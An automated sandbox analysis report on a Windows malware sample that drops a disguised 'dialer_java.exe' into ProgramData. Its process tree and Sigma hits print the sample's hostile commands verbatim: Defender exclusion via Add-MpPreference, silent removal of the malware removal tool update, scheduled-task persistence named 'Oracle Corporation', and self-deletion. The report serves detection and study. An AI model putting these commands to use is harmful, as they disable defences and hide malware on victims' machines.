Edit tour

Windows Analysis Report
sE5IdDeTp2.exe

Overview

General Information

Sample name:	sE5IdDeTp2.exe renamed because original name is a hash value
Original sample name:	dd36f6f79e68d5e54c75527db2da97ad.exe
Analysis ID:	1589501
MD5:	dd36f6f79e68d5e54c75527db2da97ad
SHA1:	a373e613510ada66cea74ffc590c25edc59957ac
SHA256:	3030ba393865e41fee490205bf5873b4041275a8830d5e764693771fec2bd35e
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Exploit detected, runtime environment starts unknown processes

Loading BitLocker PowerShell Module

Modifies the context of a thread in another process (thread injection)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Self deletion via cmd or bat file

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses dynamic DNS services

Uses schtasks.exe or at.exe to add and modify task schedules

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

sE5IdDeTp2.exe (PID: 5316 cmdline: "C:\Users\user\Desktop\sE5IdDeTp2.exe" MD5: DD36F6F79E68D5E54C75527DB2DA97AD)

powershell.exe (PID: 6036 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7212 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 7292 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

schtasks.exe (PID: 7220 cmdline: C:\Windows\system32\schtasks.exe /delete /f /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7308 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7352 cmdline: C:\Windows\system32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7360 cmdline: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 7440 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)

dialer_java.exe (PID: 7448 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)

dialer_java.exe (PID: 7468 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)

powershell.exe (PID: 7480 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7612 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 7684 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

schtasks.exe (PID: 7628 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7816 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8088 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8136 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7192 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7508 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7412 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4324 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2028 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2352 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7944 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7836 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8112 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6696 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7264 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7192 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7116 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7480 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5024 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7984 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dialer_java.exe (PID: 8184 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)

powershell.exe (PID: 2836 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 7448 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

Conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7424 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dialer_java.exe (PID: 7560 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)

powershell.exe (PID: 7580 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5436 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 4348 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

schtasks.exe (PID: 1420 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 2652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dialer_java.exe (PID: 8140 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)

powershell.exe (PID: 8168 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7392 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 7212 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

schtasks.exe (PID: 7420 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dialer_java.exe (PID: 1712 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)

powershell.exe (PID: 7376 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5480 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 7608 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

schtasks.exe (PID: 3396 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dialer_java.exe (PID: 2676 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)

powershell.exe (PID: 2028 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8036 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 7852 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

Conhost.exe (PID: 3604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 3696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7904 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\sE5IdDeTp2.exe", ParentImage: C:\Users\user\Desktop\sE5IdDeTp2.exe, ParentProcessId: 5316, ParentProcessName: sE5IdDeTp2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6036, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml", CommandLine: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\sE5IdDeTp2.exe", ParentImage: C:\Users\user\Desktop\sE5IdDeTp2.exe, ParentProcessId: 5316, ParentProcessName: sE5IdDeTp2.exe, ProcessCommandLine: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml", ProcessId: 7308, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\sE5IdDeTp2.exe", ParentImage: C:\Users\user\Desktop\sE5IdDeTp2.exe, ParentProcessId: 5316, ParentProcessName: sE5IdDeTp2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6036, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:38:28.464034+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	173.244.207.29	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: sE5IdDeTp2.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140033FF0 BCryptCloseAlgorithmProvider,free,free,	25_2_0000000140033FF0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140035010 BCryptDestroyHash,BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,	25_2_0000000140035010
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140034050 BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,free,	25_2_0000000140034050
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140035080 BCryptDestroyHash,BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,BCryptOpenAlgorithmProvider,BCryptDestroyHash,BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,BCryptGetProperty,malloc,BCryptCreateHash,	25_2_0000000140035080
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400340C0 BCryptEncrypt,BCryptEncrypt,	25_2_00000001400340C0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140034200 BCryptEncrypt,	25_2_0000000140034200
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140035220 BCryptHashData,	25_2_0000000140035220
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140035270 BCryptGetProperty,BCryptFinishHash,	25_2_0000000140035270
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400342C0 BCryptDecrypt,BCryptDecrypt,	25_2_00000001400342C0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140035340 BCryptDestroyHash,BCryptDuplicateHash,	25_2_0000000140035340
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400353D0 BCryptDestroyHash,BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,	25_2_00000001400353D0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140034400 BCryptDecrypt,	25_2_0000000140034400
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400344C0 BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,free,calloc,memcpy,BCryptOpenAlgorithmProvider,BCryptGetProperty,malloc,malloc,BCryptImportKey,free,malloc,malloc,BCryptGetProperty,BCryptGetProperty,malloc,	25_2_00000001400344C0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140034A20 BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,free,calloc,memcpy,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,malloc,malloc,BCryptImportKey,free,malloc,malloc,BCryptGetProperty,BCryptGetProperty,malloc,	25_2_0000000140034A20
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140033C60 BCryptOpenAlgorithmProvider,BCryptCloseAlgorithmProvider,	25_2_0000000140033C60
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140033CE0 BCryptDestroyHash,BCryptCloseAlgorithmProvider,free,	25_2_0000000140033CE0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140033D40 BCryptOpenAlgorithmProvider,BCryptGetProperty,malloc,	25_2_0000000140033D40
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140034FA0 BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,free,free,	25_2_0000000140034FA0

Source: unknown

HTTPS traffic detected: 173.244.207.29:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: sE5IdDeTp2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400389D0 MultiByteToWideChar,MultiByteToWideChar,calloc,MultiByteToWideChar,FindFirstFileW,free,FindClose,		25_2_00000001400389D0
